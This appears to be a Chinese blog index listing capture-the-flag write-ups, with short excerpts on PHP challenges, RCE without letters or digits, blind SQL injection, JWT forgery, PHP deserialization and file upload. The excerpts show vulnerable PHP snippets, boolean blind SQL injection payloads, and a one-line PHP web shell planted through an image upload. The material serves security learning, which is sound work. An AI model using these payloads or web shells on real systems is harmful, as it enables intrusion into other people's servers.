CTFSHOW-2026元旦跨年欢乐赛 happy202612345678910111213<?phperror_reporting(0);highlight_file(__FILE__);$happy = $_GET['happy'];$new = $_GET['new'];$year = $_GET['year'];if($year==2026 && 2026-01-08 CTF
浅谈无字母数字RCE 引子123456789<?phphighlight_file(__FILE__);$Pr0 = $_GET['Pr0'];if(preg_match("/[A-Za-z0-9]+/",$Pr0)){ die("我不喜欢字母和数字!!!");}@eval($Pr0);?> url取反绕过(PHP7)1 2026-01-07 CTF
训练场 error_sql本来看了描述还以为是报错注入结果进去才发现只回显是否查询成功,典型的布尔盲注 吸取上次的教训先测一下WAF,好吧没有 11' and length(database())=10 and '1'='1 确定数据库名长度 11' and substr(database(),1,1)='t' and '1 2026-01-04 CTF
JWT详解 参考知识JWT基础知识 JWT CTF实战 [PCTF] Jwt_password_manager 题目提示仪表盘支持jwt认证,代码发现提示flag在admin用户中 先注册一个普通用户拿到token,再结合secret_key修改权限 修改token拿到flag [BaseCTF2024] NO JWT首先审计代码,发现/login和/flag路径 打开/fl 2025-12-29 CTF
PHP反序列化漏洞 PHP反序列化漏洞1.基础语法1.1 面向对象对象实例化:$对象名 = new 类名(); 访问成员 成员方法:$对象名->成员方法名(); 成员变量:$对象名->成员变量名; $this 关键字:在类内部调用本类的成员变量 / 方法时使用,如 $this->变量名/$this->方法名()。 1.2 序列化与反序列化序列化是将对象的状态信息(属性) 2025-12-24 CTF
SDPCSEC纳新赛1.0 WEB五言123456789<?php$Pr0 = $_GET['Pr0'];if(strlen($Pr0) > 5){ die("太太太太太长了!");}else{ @system($Pr0);}?> 限制Pr0只能有五个字符 听说你是高玩?查看页面源代码发现ffffflllllaa 2025-12-20 CTF
正则表达式 在很多题目中都用到过正则表达式,但是每次都借助ai,没有好好学习过,故写篇文章系统学习一下 正则表达式是一种用于匹配和操作文本的强大工具,它是由一系列字符和特殊字符组成的模式,用于描述要匹配的文本模式。 注:python部分根据《python编程快速上手——让繁琐工作自动化》总结,php部分由豆包ai生成 python一个例子12345>>>import re>>&g 2025-12-18 CTF
BaseCTF2024复现 滤个不停123456789101112131415161718192021222324252627282930313233343536373839<?php highlight_file(__FILE__); error_reporting(0); $incompetent = $_POST['incompetent']; $Datch = $_POST['Da 2025-11-30 CTF
SDPCSEC2025热身赛 ez_uploadphp图片马 上传一张图片然后拦截请求,修改文件后缀名及内容,植入一句话木马 1<?php @eval($_POST['pass']);?> rHeEsApDoEnRsSe根据题目名及页面提示,flag在响应头里面,使用curl命令 1curl -I http://175.27.251.122:32999/ curl 是一个功能强大的命令行工具 2025-11-19 CTF
SQL注入 一、SQL 注入基础核心原理:用户输入未经过滤直接拼接到 SQL 语句中,导致恶意代码被执行。 CTF 常见注入类型: 联合查询注入(UNION) 布尔盲注 时间盲注 报错注入 堆叠查询注入 宽字节注入 二次注入 常见注入点 GET 参数:http://example.com/page.php?id=1 POST 参数:登录框、搜索框、留言板等表单提交的参数。 Cookie:Cookie 2025-11-15 CTF